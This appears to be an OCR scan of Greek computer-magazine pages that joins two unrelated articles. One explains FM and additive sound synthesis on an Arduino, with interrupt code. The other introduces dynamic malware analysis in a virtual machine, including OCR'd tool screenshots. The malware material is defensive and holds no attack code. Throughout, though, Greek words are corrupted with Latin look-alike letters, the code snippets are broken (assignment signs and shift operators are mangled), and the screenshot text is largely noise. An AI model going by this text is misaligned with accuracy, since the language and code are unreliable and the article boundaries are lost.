Αυτή η συνάρτηση μοιάζει αρκετά p’ εκείνη που υλοποιεί èva 
πρόγραµµα σύνθεσης ΕΜ. Ωστόσο ἐχουμε παραβλέψει κάτι σημαντικὀ: 
Τα αντίστοιχα περιγράμματα έντασης! Βλέπετε, τόσο το TEAIKO κύμα 
(αυτό που προκύπτει and την ὀλη σύνθεση), ὁσο και το κύμα FM, 
χαρακτηρἰζονται ano ἑνα περίγραμμα. Ιδιαίτερο ενδιαφέρον παρουσιάζει 
το δεύτερο περίγραμμα (εκεϊνο του κύματος FM). Οι µεταβολές σε αυτό 
το περίγραμμα συμπαρασύρουν το βάθος της διαμόρφωσης! Με ἆλλα 
λόγια, αυτὀ το περίγραμμα καθορίζει το πόσο έντονη θα εἶναι η επἰδραση 
της διαμόρφωσης ΕΜ, για κάθε χρονικἠ στιγµή. Δείτε nog γίνεται η 
συνάρτηση av ενσωµατώσουμε τα περιγράμματα και θα καταλάβετε 
αμέσως τι εννοούμε: 


f(t) = Amp(t)«sin(0(t)+depth+sAMP fm(t)*SiN(Pm(t))) 


H συνάρτηση Amp(t) περιγράφει ro περίγραμμα έντασης yia To TEÀIKÓ 
κύμα, evo η συνάρτηση Ampfm(t) προσδιορίζει το περίγραμμα ἐντασης 
για το κύμα που διαμορφώνει TO τελικὀ. Εἶναι φανερὀ, ropa, ὁτι το βάθος 
της διαμόρφωσης προκύπτει ano το γινόμενο depth*Ampfm(t). Ως εκ 
τούτου, το βάθος μεταβάλλεται µε την πάροδο του χρόνου και δεν εἶναι 
σταθερὀ. Τελικά, το πρὀγραμμὰ µας θα πρέπει να υπολογίζει τις τιμές 
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µιας αρκετἀ σύνθετης συνάρτησης 
και μάλιστα εξαιρετικἀ γρήγορα”. 
Στη δικἠ µας υλοποίηση, η 
συνάρτηση Amp(t) θα αποτελεὶ 
το γινόμενο µιας φθίνουσας και 
μιας αὐξουσας εκθετικής. Εν 
ολίγοις, θα υλοποιεί το γνωστὀ 
περίγραμμα ἐντασης που εἰδαμε 
στο προηγούμενο ap8po της 
σειρὰς. H συνάρτηση Ampfm(t) 
θα εἶναι µια φθίνουσα εκθετικἠ, 
ώστε η επἱδραση της τεχνικής FM 
στο τελικὀ κύμα να εξασθενεί µε 
την πάροδο του χρόνου. Πα να 
κατανοήσετε καλύτερα αυτό που 
μόλις περιγράψαμε, pi&re µια ματιά 


στις εικὀνες 6 και 7. 


Στην πράξη 


Αυτή τη φορὰ γράψαμε τρία 
διαφορετικἁ προγράμματα! Το ¿va 
αποτελεί τη βελτιωμένη εκδοχἠ 
του πιάνου και αξιοποιεί την 
τεχνικἠ additive synthesis (http:// 
bit.ly/dh017ddspiano). Τα ἄλλα δύο 
υλοποιούν την τεχνικὴ ΕΜ synthe- 
sis κι αποτελούν δύο υποτυπώδη 
FM synthesizer (http://bit.ly/dh- 
017fmsynth). Αμφότερα βασίζονται 
στον κὠδικα αλλά και στο κύκλωμα 
του πιάνου. To ἑνα εφαρμόζει την 
τεχνικὴ ΕΜ σε κάθε νότα nou 
πατάμε, χρησιμοποιώντας Eva σταθερὸ βάθος κι va συγκεκριμένο 
περίγραμμα έντασης yia το κύμα ΕΜ. Πα το δεύτερο πρὀγραμμα έχουμε 
προσθέσει στο κύκλωμα δύο ποτενσιόµετρα. Με τη βοήθεια αυτών των 
ρυθμιστικὠν μπορούμε να μεταβάλλουμε το βάθος της διαμόρφωσης FM, 
όπως και την κλίση της εκθετικἠς μείωσης, η οποία χρησιµοποιείται σαν 
περίγραμμα έντασης yia To κύμα ΕΜ. Έτσι, µε το δεύτερο πρὀγραμμα και 
τις αντίστοιχες προσθήκες στο κύκλωμα, το μίνι synthesizer επιτρέπει 
στο χρήστη να μεταβάλλει δυναμικἁ τις παραμέτρους της διαμόρφωσης 
FM. H κατασκευἠ µας µπορεί να µην εἶναι ἐτοιμη για τη µουσικἠ 
βιομηχανία, αλλά πιστεύουμε OT! θα βοηθήσει αρκετά στην κατανόηση 
όσων περιγράψαμε, evo ενδέχεται σαν σας απασχολήσει δημιουργικά για 
αρκετές ὠρες. 


Υλοποίηση 


Τα προγράµµατα που γράψαμε στηρἰζονται στην τελευταἰα ἐκδοση του 
κὠδικα για το πιάνο. Οι μόνες διαφορὲς που παρουσιάζουν εντοπίζονται 
στη ρουτίνα εξυπηρέτησης Tou interrupt: εκεἰ ὁπου υπολογίζονται τα νέα 
δείγματα. Ἐτσι, αν και οι διαφορές εἶναι ελάχιστες, εἶναι πολὺ σημαντικὲς 
και ουσιαστικά επιδεικνύουν το πώς υλοποιείται η κάθε τεχνικἠ. Ας δούμε 
τις γραμμές που προστέθηκαν στο dds piano, v3. 


2. Κάθε φορά nou θα απαιτεἰται Eva νἐο δείγμα: 16000 φορὲς το δευτερόλεπτο! 


Εικὀνα 5 

Τα περιγράμματα 
έντασης που 
υλοποιούν τα 
προγράμματα του 
άρθρου. Το πάνω 
εφαρμόζεται στα 
τελικά κύματα 

-- σε αυτά που 
προκύπτουν απὀ 
την ἐξοδο κάθε 
προγράμματος. To 
κάτω περίγραμμα 
εφαρμόζεται στη 
δεύτερη αρμονική 
(στην περίπτωση 
της τεχνικής ad- 
ditive), καθώς 
και στο κύμα που 
διαμορφώνει τη 
συχνότητα (στην 
περίπτωση της 
τεχνικής ΕΜ). 


WV'HAGIKER 


ÁN 


// second harmonic 

sh phase.int val += sh phase delta; 
sample ptr - sh phase.bytes[1]; 

sh sample - sine256[sample ptr]; 

// first harmonic 

phase.int val += phase delta; 
sample ptr - phase.bytes[1]; 

// set PWM output 


OCR2A = 128 + ((amp envelope.bytes[1] * sine256[sample ptr]) >> 
9) 


* ((sh amplitude.bytes[1] * sh sample) »» 9); 


Ὅπως βλέπετε, o κώδικας υλοποιείτην τεχνικἠ DDS δύο φορές: Την πρώτη 
υπολογίζεται το δείγμα για τη δεύτερη αρµονικἠ (sh. sample ano To sec- 
ond harmonic), ενώ τη δεύτερη υπολογίζεται το δείγμα για την πρώτη 
αρμονική. Στη συνέχεια, κάθε δείγμα πολλαπλασιάζεται µε το κατάλληλο 
πλάτος. Παρατηρεἰστε ὁτι and κάθε γινόμενο κρατάμε το περισσότερο 

σηµαντικὀ byte και μάλιστα το 


διαιρούµε HE To 2 (η δεξιά ολίσθηση 
1 δεν πραγματοποιείται Kata 8, 
αλλά κατά 9 bit). To γεγονὸς Ori 
κρατάμε μόνο To περισσότερο 
σηµαντικὀ byte αποτελεὶ μια 
1 χοντροκομμένη απλοποίηση των 
πράξεων, την οποία περιγράψαμε 
και στο προηγούμενο ἆρθρο της 
1 σειρὰς. H επιπρὀσθετη διαίρεση 
µε το 2, ὅμως, πραγματοποιείται 
για vav εντελὼς διαφορετικὀ 


Εικόνα 6 

To πρόγραµµα 
που υλοποιεί την 
τεχνική ΕΜ παράγει 
ήχους µε αυτήν 
περίπου τη µορφή. 
Παρατηρείστε ori 
η παραμόρφωση 
(εξαιτίας της 
διαμόρφωσης 

ΕΜ) φθίνει µε 

την πάροδο Tou 
χρόνου και TO 
κύμα αποκτά ὁλο 
και περισσότερο 
τη γνώριµη 
ηµιτονοειδή 
μορφή. 
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λόγο. Ουσιαστικά, αποτελεἰ éva 
εἶδος normalization, To  onoio 
εξασφαλίζει ὁτι η πρὀσθεση των δειγμάτων ano ra δύο κύματα θα 
παραμείνει στο διάστηµα [0, 255] και δεν θα επεκταθεἰ στο [0, 511]. 
Κάτι τέτοιο δεν θα αποτελούσε πρὀβλημα and μαθηματικὴς σκοπιάς, 
αλλά το συγκεκριμένο κανάλι PWM του Arduino (OCR2A) εἶναι 8µπιτο 
και δεν δέχεται τιμὲς μεγαλύτερες ano το 255. Ας δούμε τώρα και τις ΠΙΟ 
ενδιαφἐρουσες γραμμὲς and τον κὠδικα που υλοποιεί την τεχνικἠ ΕΜ... 


// FM component 
fm phase.int val += fm phase delta; 
sample ptr - fm phase.bytes[1]; 
fm sample - sine256[sample ptr]; 
// main component 
phase.int val = phase.int val + phase delta 
* (fm sample * (fm amplitude.int val »» fm depth)); 
sample ptr - phase.bytes[1]; 
// set PWM output 
OCR2A = 128 + ((amp envelope.bytes[1] * sine256[sample ptr]) >> 8); 


Arduino Sound Master: Κύμα μέσα στο κύμα! 
«Αα 


Εδὠ το πράγμα περιπλέκεται 
λίγο. Κατ’ αρχάς, ο κὠδικας 
υλοποιεὶ την τεχνικἠ DDS για 


το κύμα ΕΜ. Ωστόσο το δείγμα 
που προκύπτει δεν καταλήγει 
στην ἐξοδο του συστήματος (στο 
κανάλι PWM). Το συγκεκριµένο 
δείγμα πολλαπλασιάζεται µε το 
περίγραμμα έντασης του κύματος 
ΕΜ, ενώ διαιρείται και µε µια δύναμη 
του δύο (δεξιά ολίσθηση κατά fm . 
depth). Αυτή η διαίρεση αποτελεί 


ουσιαστικά τον πολλαπλασιασμὀ | a anan, 
µε το βάθος — το βάθος εἶναι µικρὀτερο της μονάδας. Τελικά, το 
αποτέλεσµα που προκύπτει ano αυτές τις πράξεις χρησιμοποιείται σαν 
offset yia τη φάση του τελικού κύματος. Έτσι, η φάση αυτού του κύματος 
δεν αυξάνει διαρκὠς και ομοιόμορφα, ὁπως συμβαίνει στην τεχνικἠ 
DDS. Ed χρειάζεται λίγη προσοχή: O ρυθμὸς αὐξησης της φάσης 
καθορἰζει τη συχνότητα του κύματος. Ακριβώς γι’ αυτό, όταν θέλουμε 
va σχηµατίσουµε κύματα μεγάλης συχνότητας επιλέγουμε μεγάλο βήμα 
για τη φάση (phase delta) κι αντίστροφα. Τελικά, µε όλα ra αριθµητικἀ 
τερτίπια του κὠδικα, αυτό nou NETUXGIVOUHE εἶναι να μεταβάλλουμε το 
ρυθμὀ µε rov οποίο αυξάνει η φάση του τελικού κύματος. Με αυτόν τον 
τρόπο, μεταβάλλουμε TEAIKG και τη συχνὀτητἁ TOU. Ευκολάκι, ἐτσι; 


Στα προγράµµατα nou γράψαμε για αυτὸ το άρθρο xouv γίνει κι ἄλλες 
προσθήκες. Oi κυριότερες απὀ αυτές αφορούν στον υπολογισμό των 
περιγραμμάτων έντασης yia ra πρὀσθετα κύματα. Εξάλλου, To va 
πρὀγραμμα που υλοποιεί την τεχνικἠ ΕΜ διαβάζει και τις τιμὲς απὀ δύο 
ποτενσιόµετρα. Προφανώς, auró προὐποθέτει μερικὲς γραμμὲς κὠδικα 
οι οποίες θα διαβάζουν τις αντἰστοιχες αναλογικὲς εισόδους του Arduino 
και θα ενημερώνουν κατάλληλα τις μεταβλητὲς του συστήματος. Όλα 
αυτά ὁμως νομίζουμε OT! εἶναι αρκετἁ anAd. Εἱμαστε βἐβαιοι ὁτι εδὠ που 
έχουμε φτάσει, αν εξετἁσετε τον κὠδικα θα τα κατανοήσετε αμέσως. 


ουτηρωγ νι 


Εικόνα 7 

Στις δικὲς µας 
υλοποιήσεις, 

το κύμα που 
διαμορφώνει τη 
συχνότητα του 
τελικού κύματος 
φθίνει εκθετικἀ. 
Όσο πιο γρήγορη 
εἶναι η εν λόγω 
εκθετική µείωση, 
τόσο λιγότερο 
διαρκούν και τα 
έντονα σημάδια 
παραμόρφωσης. 
Στην εικὀνα 
βλέπουμε 

την τελική 
κυματομορφή για 
µια σχετικἁ αργή 
εκθετική µείωση. 


Εικόνα 8 

Το κύκλωμα για το 
synthesizer βασίζεται 
στο κύκλωμα για 

TO riiaváki. H μόνη 
αλλαγή σχετίζεται µε 
την προσθήκη των 
δύο ποτενσιόµετρων. 
Ta εν λόγω στοιχεία 
λειτουργούν ως 
διαιρέτες τάσης και η 
έξοδος του καθενός 
οδηγείται στο Ar- 
duino. Πα auTo To 
σκοπὀ, οἱ ακριανοί 
ακροδέκτες κάθε 
ποτενσιόµετρου εἰναι 
συνδεμένοι στα 5V 
kai στο GND, ενώ ο 
μεσαίος καταλήγει 
σε μία απὀ τις 
αναλογικἐς εισόδους 
του Arduino. 
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Ὅπως αναφἐραµε στο πρώτο άρθρο της σειρἁς µας, η στατικἠ ανάλυση 
περιλαμβάνει ὁλες τις εργασἰες που εκτελούμµε για την εξέταση ενὀὸς npo- 
γράμματος *xopic* ὁμως va το EKTEAEGOUHE. Θεωρητικά, θα μπορούσα- 
HE µέσω εκτεταμένης στατικὴς ανάλυσης να δώσουμε απαντήσεις σε όλα 
τα ζητήματα που αφορούν στη λειτουργία ενὸς κακὀβουλου προγράμμα- 
τος. Κάτι τέτοιο όμως θα ἦταν πάρα πολύ δύσκολο και θα απαιτούσε πάρα 
πολὺ χρόνο. Συνήθως, περισσότερο µας ενδιαφἑρει να ανακαλύψουμε το 
*TI* κάνει ἑνα κακόβουλο πρὀγραμμα κι OXI το *noc* ακριβώς το κάνει. 
Κάπως TOI μπαίνει στο παιχνίδι η λεγόμενη δυναμική ανάλυση 


Πρὀκειται για διαδικασία κατὰ την οποία εξετάζουμε τη συμπεριφορά 
ενὸς κακὀβουλου προγράμματος, την opa που αυτό εκτελείται! H õu- 
ναµικἠ ανάλυση προβλέπει την εκτέλεση του UNO εξέταση προγράμμα- 
τος παραπάνω ano µία φορὰ. Αυτό εἶναι αναγκαίο, γιατἰ οι παράμετροι 
που εξετάζουμε εἶναι αρκετὲς. Αναφερόμενοι στη συμπεριφορά ενὸς 
προγράμματος, θυμηθείτε τη θεωρία nou αναπτύξαμε στο προηγούμε- 
vo άρθρο: Εκεἰ αναφερθήκαµε στην ανάλυση συμπεριφοράς ἡ αλλιώς 
behavioral analysis. Τι εἰναι αυτή; Πρόκειται για την εξέταση των ενερ- 
γειὼν που εκτελεἰ το κακόβουλο πρόγραμμα στο περιβάλλον εντὸς του 
οποίου εκτελείται. Παραδείγματα τέτοιων ενεργειών εἶναι οι αλλαγὲς στο 
registry των Windows, τα αρχεία που δημιουργεἰ, αυτά nou Tpononolei, Οἱ 
απὀπειρες σύνδεσης στο Διαδίκτυο, τα δεδομένα που στέλνει κ.λπ. 


Σε αντίθεση µε τη στατικἠ, η δυναμικἠ ανάλυση επιτρέπει να παρατηρἠ- 
OOUHE και να καταγράψουµε τη λειτουργικότητα ενὸς malware µε βεβαι- 
ὁτητα. Αυτό το διευκρινίζουµε ylaTi, ὁπως θα ‘yETE καταλάβει, η στατικἠ 
ανάλυση δεν οδηγεἰ πάντα σε ξεκάθαρα συμπεράσματα για το πώς λει- 
τουργεὶ ¿va malware. H στατικἡ ανάλυση μὰς επιτρἐπει μόνο να κάνουμε 
μερικὲς υποθέσεις. Πα παράδειγμα, µε τη στατικἠ ανάλυση ενδέχεται va 
εντοπἰσουμε ora αλφαριθµητικἁ (strings) ενός προγράµµατος την nE- 
ριγραφἠ για κάποιες λειτουργίες. AUTO δεν σημαίνει απαραἰτητα oT! av 
εκτελἐσουµμε TO πρὀγραµμμα θα εκτελεστούν και οι σχετικὲς ενέργειες! 
Μπορεί να ενεργοποιούνται μόνο υπό πολύ σπάνιες συνθήκες rj ακόµα 
και να τοποθετήθηκαν στον κὠδικα επἰτηδες. Μια πιο αθώα εξήγηση θα 
μπορούσε va εἶναι πως o δημιουργὸς δεν ἐχει υλοποιήσει *akópa* τις 
εν λόγω λειτουργἰες, αλλά τις ἐχει προσθέσει στον κὠδικα σε uia λίστα 
TODO. 


Παρόλο nou η δυναμική ανάλυση εἶναι πιο ουσιώδης κι επιτρέπει να βγά- 
ζουμε πρακτικἀ συμπεράσματα για τη λειτουργία ενὸς προγράµµατος, 
δεν πρέπει va παραβλέπουµε τη στατικἠ! H δυναμική ανάλυση πρέπει va 
πραγματοποιείται πάντοτε σε συνδυασμὀ µε τη στατικἠ και μάλιστα σε 
δεύτερο χρὀνο. Ας σταθούμε λἰγο στους πιο προφανείς λόγους, για τους 
οποίους πρέπει να ακολουθούμε πάντα αυτόν τον κανόνα. 


H δυναµικἠ ανάλυση, εφόσον περιλαμβάνει την εκτέλεση rou malware, 
θέτει το σύστημα αλλά και το τοπικὀ µας δίκτυο σε κἰνδυνο. Επομέ- 
νως, πριν TO εκτελέσουμε, θα ἦταν φρόνιμο να ἐχουμε τουλάχιστον µια 
ιδέα για το τι πρὀκειται να κάνει. Εξάλλου, η δυναμική ανάλυση EXE! κι 
αυτἠ τους περιορισμούς της. Ένα κακόβουλο πρὀγραμμα θα μπορούσε 
να δέχεται παραμέτρους órav, N.X., εκτελεἰται anó τη γραμμή εντολώὠν 
(command line), οι οποίες και θα ενεργοποιούσαν νἑες/διαφορετικὲς λει- 
τουργἱες. Χωρίς τη στατικἠ ανάλυση, λοιπὸν, θα ἦταν μάλλον απίθανο 
να μαντέψουμε ποιες εἶναι αυτὲς οι παράμετροι και TO τι περίπου κάνει 
η καθεμία. 
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Ανάλυση συμπεριφοράς 


Πριν προχωρήσουμε στα ενδότερα, θα ἦταν χρήσιμο να ολοκληρώσουμε 
τη θεωρία πίσω and τη δυναμικὴ ανάλυση, καθώς και την ανάλυση ou- 
μπεριφοράς. Όπως εἰπαμε, το malware sample εκτελείται αρκετὲς φορὲς 
και μάλιστα µέσα o’ Eva ειδικἁ διαμορφωμένο σύστημα (n.x., EVTOG µιας 
εικονικἠς μηχανής). Κάθε φορά nou εκτελούμε το πρὀγραµµα συγκε- 
VTPWVOUHE την προσοχἠ µας σε μία απὀ τις «πολλὲςξ παραμέτρους της 
ανάλυσης συμπεριφοράς. ‘Eva malware βλέπετε μπορεί va πραγµατοποι- 
εἰ χίλιες-δυο μικρὲς ἡ μεγάλες αλλαγές στο σύστημα. Εμείς θα πρέπει 
να ἐχουμε υπόψη µας ὁλους τους πιθανούς τομεὶς της δράσης του και 
να μελετήσουμε τον καθένα συστηματικἁ και ξεχωριστὰ. Μόνον ἐτσι θα 
μπορέσουμε να συγκεντρώσουμε OAEG τις απαιτούμενες πληροφορίες, 
MOTE να βγάλουμε στο τέλος χρήσιμα συμπεράσματα. Κατὰ την ανάλυση 
συμπεριφοράς (που πραγματοποιείται μέσω της δυναμικής ανάλυσης), n 
μελέτη µας εκτείνεται στα ακόλουθα δύο πεδία: 


1, Σύστημα. Τυπικά Eva κακόβουλο πρὀγραμμα μεταβάλλει διάφορα 
στοιχεία στο σύστημα ὀπου εκτελείται. H διερεύνηση αυτών των επεµ- 
βάσεων αποτελεἰ συνήθως το πρῶτο στάδιο της δυναμικής ανάλυσης. Ev 
ολίγοις, μὰς ενδιαφέρουν τα ακόλουθα: 


e Ανάλυση προσωρινἠς μνήμης (RAM). Το malware µπορεί να 
υπερχειλἰζει προσωρινὲς θέσεις μνήμης (buffer overflow) ἠ/και va 
χειρίζεται τη μνήμη RAM µε διάφορους ανορθόδοξους τρόπους, µε 


Εικόνα 1 

Το εργαστήριό µας 
αναβαθμίστηκε µε 
γέα εργαλεία, Τα 
οποία θα χρησιµο- 
ποιήσουµε κατά τη 
δυναμική ανάλυση! 


Εικόνα 2 

Από ro παράθυρο 
rou VirtualBox 
πρέπει «οπωσδή- 
ποτε va κρατή- 
goue Eva καθαρὀ 
snapshot της 
εικονικής μηχανής, 
λίγο πριν την npo- 
τη εκτέλεση του 
malware sample! 
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σκοπὀ να αποκτήσει πρόσβαση σε διαβαθμισμένες λειτουργίες του 
συστήματος. Η καταγραφἠ της κατάστασης της μνήμης (memory 
dump) πριν και μετὰ την εκτέλεση θα µας επιτρέψει va δούμε αν 
και noc το malware χρησιμοποιεί τη μνήμη RAM για να oAokAnpo- 
σει την αποστολή του. 


ο Αλλαγές σε ρυθμίσεις του συστήµατος. Συνήθως, αυτές 
πραγματοποιούνται στο registry. Εξετάζοντας την κατάσταση του 
registry πριν και μετὰ την εκτέλεση rou malware, μπορούμε να 
δούμε av και ποιες αλλαγές πραγματοποιήθηκαν, ὁπως και TO OKO- 
nó που εξυπηρετούν. 


ο Ενέργειες σε αρχεία: Ένα malware μπορεί να δημιουργεί, να 
τροποποιεἰ και να διαγράφει αρχεία του συστήματος. Προφανώς, 
μὰς ενδιαφἑρει και NGAI να παρατηρήσουμε τις αλλαγές που πραγ- 
ματοποιούνται κατὰ την εκτέλεση rou malware. Διατηρώντας μία 
λίστα των αρχείων του συστήματος μπορούμε να δούμε ποια ap- 
χεία προστέθηκαν, ποια τροποποιήθηκαν και ποια σβήστηκαν. Πα- 
ρεμπιπτόντως, σε αυτή την εργασία μπορεί να µας βοηθήσει πολύ 
η τεχνικἠ του hashing, την οποία περιγράψαμε στο προηγούμενο 
άρθρο. Εκτὸς ano την αποτελεσματικἡ ονοματοδοσία των malware 
samples, η εν λόγω τεχνικἠ ενδέχεται να φανεὶ πολύτιμη και για 
τον εὐκολο EVTONIOHO ακόµη και TOV πιο μικρῶν αλλαγών σε Kå- 
ποιο αρχείο. Υπενθυμίζουμε OT! ακόµη κι Eva byte ν΄ αλλάξει σε 
κάποιο αρχείο, η συνάρτηση κατακερματισμού (hashing function) 
θα µας δώσει Eva εντελώς διαφορετικό αποτέλεσµα και η τροπο- 
ποίηση του αρχείου θα γίνει αμέσως αντιληπτή. 


ο Διεργασίες και υπηρεσίες του συστήματος: Εξετάζουµε αν EK- 
κινήθηκαν νέες διεργασίες στο σύστημα, ὁπως επἰσης και το αν 
άλλαξε η κατάσταση σε υπηρεσίες που εκτελούνταν dn. Πα napa- 
δειγµα, εἶναι πολύ λογικὀ Eva malware να θέλει να σταματήσει τα 
προγράμματα antivirus ἡ να θέλει να αποκρύψει µε κἄποιον τρόπο 
τη δικἠ του διεργασία (process). Πα ἄλλη µια Popa, καταγράφουµε 
την κατάσταση του περιβάλλοντος πριν και μετά την EKTEAEON TOU 
κακόβουλου αρχείου. 


Στα δικἀ µας πειράματα θα ασχοληθούμε µε τα περισσότερα ano τα na- 
ραπάνω. 


File Machine Help 


Q eb > $ {details [11] Snapshots (1) 


New Settings Start Discard 


BackTrack 5 
@ Powered off 


αἰ] Windows XP SP3 (Dynamic Malware Analysis) 
“xp: [f= Saved B Current State 


AvdAuon malware, για όλους! Δυναμική προσέγγιση 
WP 


= Autoruns [WINDOWS-MALWARE\Windows XP VM] - Sysinternals: www.sysinternals.com 


File Entry Options User Help 


|diassadxs» 
ImageHiacks | |5 Αρ | 8) KnownDLLs | ff Winlogon | Ελ Winsock Providers | ($ Print Monitors © LSAProviders | α Network Providers 
© Everything | 44 Logon | H Explorer | 8 Intemet Explorer | (4 Scheduled Tasks | fü Services | Æ Dives | [3] Codecs | [F] Boot Execute | 
ji tic Publisher Image Path ^ 
HKLMNSOFTWARE \Microsoft\ Windows! fersion\Run 


a 


-. Oracle Corporation 
| £j HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components 


[4] [7] Address Book 6 Dutlook Express Setup Libr... Microsoft Corporation c:\program files\outlook express \setup50.exe 
|] E] Microsoft Outlook Express 6 Outlook Express Setup Libr... Microsoft Corporation c:\program files\outlook express \setup50.exe 
| gif HKCUSSOFTWARE \Microsoft\Intemet Explorer\Desktop\Components 
v| 1 
πω ο ο ο ο 
ΓΞ] 4$ Windows Messenger Windows Messenger Microsoft Corporation c:\program files\messenger\msmsgs.exe 
| a? HKLM SistenlCareriConiraSel Senices. 
[v] E] peapa Allows to capture traffic on t.. CACE Technologies, Inc. c:\program fles Wwiinpcapvipcapd exe 
-] ΝᾺ VBoxService Manages VM runtime inform... Oracle Corporation c:\windows\system32\vboxservice, exe 


| gl. HKLM \System\CurrentControlSet\Services 
] [E acS7intc Intel( Integrated Controller... Intel Corporation c:\windows\systern32\diivers\acS7inte. sys 
7] [E] CaptureFileMonitor Capture Kemel Driver c:Awindows\spstem32\chivers\capturefilemonitor.sps 
ν] “] 
ΕΙ 


c: WiindowsNsystem32 drivers Wnpf.sys 


c:\windows\system32\dhivers\pentpci5.sys 


Direct Parallel Link Driver Parallel Technologies, Inc. — c: \windows\system32\drivers\ptilink, sys 


[κ] [5 T [S] [S] [S] e [11 [C] [T [S] [ST [T [E] [T [C [ST [T [T] [T [T] [5 


[5] Secdrv SafeDisc diiver Macrovision Corporation, M... c: WwindowsNsystem3ZNdriversVsecdrv.sys 
lo«Guest frtualBox Guest Driver racle Corporation c:\windows system, rivers’ quest. sys 
VBos VirtualBox Guest Dri Oracle Corporat \windowss\system32\ dhivers\wbos 
joxMouse fitualBox Mouse Filter racle Corporation. c:\windows\system32\drivers\vboxmouse. sys 

VBosM VirtualBox Mouse Fil Oracle Corporati Weindowshsystem32 divers who, 
[rz] VBoxSF. VirtualBox Shared Folders... Oracle Corporation c:\windows\system32\drivers\vboxst sys. 
zj VBosVi 'itualBox Video Driver racle Corporation cwindows'system32 drivers wbosvideo.sys 
[£j VBoiVideo VirtualBox Video D Oracle C. \windows\system32\ dhivers\vboxvidk 
5 

| f. HKLM \Softwere\Microsoft\Windows NT\CurentVersion\Diivers32 
[£j meacmiac2 Indeo® audio software Intel Corporation c:\windows\systemn32\iac25_32.a8 
8 msacm.I3acm MPEG Layer-3 Audio Code... Fraunhofer Institut Integriert... c:vwindowsNsystem32V3codeca. acm 
Sj msacm.s| anet io coc for ipro Lab Telecom Inc. ο WwindowsNsystem: | anet.acm 
L Audio codec forMSACM Θίριο Lab Telecom l \windows\system32\sl 

Ej msacm.lrspcl toup TrueSpeech([T.... x c: iindowsNsystem32NLssofl 32 acm 
[8 h DSP Group TrueSpeech(T... DSP GROUP, INC. \windows\system2\tesoft32 
8) vide:cvic inepak® Codec ius Inc. c:\windows\spstem32\icovid.dll 

idc.cvid Cinepak® Cod Radius | indows\system32\icovid αἱ 
t DA CHI syst bA 

ΕΙ 8 νάοίνϑι NwindowsNsystem32 i32 32.41 [ 4 
Ready. | Windows Entries Hidden. 


2, Δίκτυο. Αφού anokrrjcoupe µια &ikóva όσων επιχειρεἰ το εκάστοτε 
malware στο ἰδιο το σύστημα, προχωράμε στη μελέτη της δικτυακής OU- 
μπεριφοράς του. Κατὰ κανόνα, ¿va malware θα δοκιμάσει να συνδεθεὶ 
σε διάφορες τοποθεσίες στο Διαδίκτυο (domains ἡ διευθύνσεις IP), and 
τις οποίες θα περιμένει διαταγὲς για τη συνέχεια ἡ θα στείλει ra αποτε- 
λἐσματα της δράσης του (κωδικούς πιστωτικὠν καρτών που UNEKAEWE, 
λογαριασμούς email k.An.). Επομένως η ανάλυση των δικτυακών κινἠσε- 
ων εἶναι απαραίτητη για να κατανοήσουμε ποια ακριβώς εἶναι η αποστολἠ 
TOU. Όπως και πριν, εκτελούμε ro malware sample αρκετὲς φορὲς κι 
εστιάζουµε στα ακόλουθα: 


ο Δικτυακή κίνηση (network traffic). Πρέπει να παρακολουθή- 
OOUHE και να καταγράψουµε τη δικτυακή κίνηση που σχετίζεται 
με ro malware. Αυτή τη διαδικασία την πραγματοποιούµε µε ειδικἀ 
εργαλεία που βλέπουν ὀλα τα πακέτα δεδοµένων που ἐρχονται και 
φεύγουν ano το σύστημα. 


e Αναζήτηση ünonrov προορισμών. Εφόσον ἐχουμε στην Ka- 
TOXN µας Eva αντίγραφο της δικτυακής κίνησης που προκλήθηκε 
ano την εκτέλεση του malware, ξεκινάμε τη διαδικασία αναζήτη- 
σης ὑποπτων στοιχεἰων. Ως τἐτοια θα μπορούσαν να θεωρηθούν oi 
διευθύνσεις IP and γνωστὰ κακόβουλα site, and παραβιασμένους 
(pOwned) υπολογιστές κ.λπ. 2’ αυτή την προσπάθεια μπορούν 
να βοηθήσουν ορισμένες βάσεις δεδοµένων, ὁπως yia παράδειγ- 


Εικόνα 3 
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πρόσθεσε Eva VEO 
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μα oi IPVoid και URLVoid. Ένα εργαλεἰο nou αξιοποιεἰ τέτοιες Bå- 
σεις προσφέρεται στη γνωστὴ ιστοσελίδα TOU VirusTotal, στο www. 
virustotal.com. 


e Ανάλυση κίνησης. Αφού γίνει η διαλογἠ κι ο εντοπισμός των 
πιθανὰ ὑποπτων προορισμών, προχωράμε στη μελέτη των δεδο- 
μένων nou μεταφέρθηκαν. Μ΄ αυτὀν τον τρόπο ενδέχεται να πλη- 
ροφορηθούμε για τα στοιχεία που συλλέγει το malware, ενώ θα 
μάθουμε και το πὼς επικοινωνεί μαζί του ο δημιουργὀς. 


‘Eva πρὀσθετο βήμα στη δικτυακἠ ανάλυση εἶναι η ανακάλυψη rou rpó- 
που εξάπλωσης του malware — αν υπάρχει. Mi’ auth την εργασἱα πρέπει 
να προσφέρουμε στο malware ἑναν εὐκολο στὀχο. Έτσι, το κακὀβου- 
Ao πρὀγραμμα θα εκδηλωθεἰ και θα µας δώσει την ευκαιρία να μελετή- 
coupe την αναπαραγωγικἠ του δράση. Όπως καταλαβαίνετε, εδὠ μπορεί 
να µας βοηθήσει ιδιαίτερα Eva honeypot. Δείτε ra σχετικἁ άρθρα στο 
deltaHacker 007. 


Πριν περάσουμε στη δράση, καλό θα ἦταν va ungvOuuicoupe τον τελικό 
okono της ανάλυσης ενὸς κακὀβουλου προγράμματος: Πρὀκειται για τη 
δηµιουργία ενὸς προφίλ, το οποίο θα περιγράφει µε ακρίβεια διάφορα 
χαρακτηριστικἁ γνωρίσματα rou malware. AUTO ro προφἰλ θα λειτουργεἰ 
κατὰ κάποιον τρόπο ως ταυτότητα kai θα προσφἑρει πληροφορἱες για τη 
δράση rou malware, τις διευθύνσεις µε τις οποίες προσπαθεἰ να επικοι- 
νωνήσει κ.λπ. Ουσιαστικά, pE TIG πληροφορίες που απαρτἰζουν ro προφίλ 


rocess Hacker [WINDOWS -MALWARE\Windows XP VM]. 


cesses (Clit 


NTAUTHORITYASYSTEM Services and Controller app. 
2,51 kB/s NTAUTHORITYISYSTEM VirtualBox Guest Additions Service 
304 Bis NT AUTHORITYISYSTEM ^ 
NT... \NETWORK SERVICE 
10,96 kB/s 


Generic Host Process for Win32 


LSA Shell (Export version) 


CPU Usage: 13.00% Physical Memory: 33.21% Processes: 23 


& MALWARE 
File Edit View Favorites Tools Help 


OQ- O- S Ah f roes [η 


Address E C:\Documents and Settings\Windows XP VM|DesktoplMALWARE 


